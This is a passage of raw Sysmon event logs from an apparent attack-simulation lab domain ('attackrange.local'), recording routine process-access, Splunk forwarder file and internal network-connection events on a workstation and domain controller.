12:24:45.204{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292516Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.204{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292515Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.204{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292514Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.204{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292513Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.057{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292512Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.041{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292511Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.041{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292510Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.041{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292509Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.041{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292508Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.041{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292507Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:45.041{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000441229Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:45.838{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DDA2C8D4C54E2806D3839641AE9B4F76,SHA256=FD42AEFBA517E9CBFFFEFA669EC9434793F9A608514C2B694CE63B75F13E3E6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000441228Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:45.823{42DC5269-CF49-6086-E100-00000000BA01}4048NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4525071D58F95D883C6C2C2E8BE8A0FD,SHA256=49F7B74E068732D672EFE1B09BF311071F646ACD12A8BE1EABE21B4A5FC2FBA4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441227Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:45.212{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DA-6086-0B05-00000000BA01}4936C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441226Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:45.212{42DC5269-CE98-6086-0C00-00000000BA01}840968C:\Windows\system32\svchost.exe{42DC5269-D4DB-6086-0C05-00000000BA01}4248C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000441225Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.050{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal60922- 354300x8000000000000000441224Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:42.040{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal61770- 354300x8000000000000000441223Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:41.953{42DC5269-CEA9-6086-2900-00000000BA01}2824C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse10.0.1.14win-dc-932.attackrange.local53domainfalse10.0.1.15ip-10-0-1-15.us-west-2.compute.internal57189- 354300x8000000000000000441222Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:41.679{42DC5269-CF43-6086-D800-00000000BA01}4100C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-932.attackrange.local62418-false10.0.1.12-8000- 23542300x8000000000000000292664Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.538{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EB9D4E643D28BF18223293C61C3EB727,SHA256=2563B166872D2FDE6E078D2B224786AB05324D50A94D318CAE2B1B59D377B166,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292663Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.027{BEA10069-D4AE-6086-4C01-00000000BB01}40366480C:\Windows\System32\rdpclip.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5342e|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292662Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.027{BEA10069-D4AE-6086-4C01-00000000BB01}40366480C:\Windows\System32\rdpclip.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+53398|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292661Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.027{BEA10069-D4AE-6086-4C01-00000000BB01}40366480C:\Windows\System32\rdpclip.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5337a|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000292660Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.027{BEA10069-D4AE-6086-4C01-00000000BB01}40366480C:\Windows\System32\rdpclip.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5337a|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000292659Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:46.022{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=28EC06C7F97971932AB6288D4A95CE97,SHA256=8DD6C3BAA347043730A1041113ED8AF003A129762C7B8608DD945EA52A5237E6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000441265Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.993{42DC5269-028E-6088-CC28-00000000BA01}5632384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{42DC5269-CF3C-6086-AA00-00000000BA01}4168C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441264Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.885{42DC5269-D4CE-6086-F004-00000000BA01}20521500C:\Windows\System32\rdpclip.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5342e|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441263Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.885{42DC5269-D4CE-6086-F004-00000000BA01}20521500C:\Windows\System32\rdpclip.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+53398|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000441262Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 12:24:46.885{42DC5269-D4CE-6086-F004-00000000BA01}20521500C:\Windows\System32\rdpclip.exe{42DC5269-D4D0-6086-FD04-00000000BA01}1144C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5337a|C:\Windows\System32\SHELL32.dll+84762|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x8000000000000000441261Microsoft-Windows-Sysmon/Operationalwin-dc-932.attackrange.local-2021-04-27 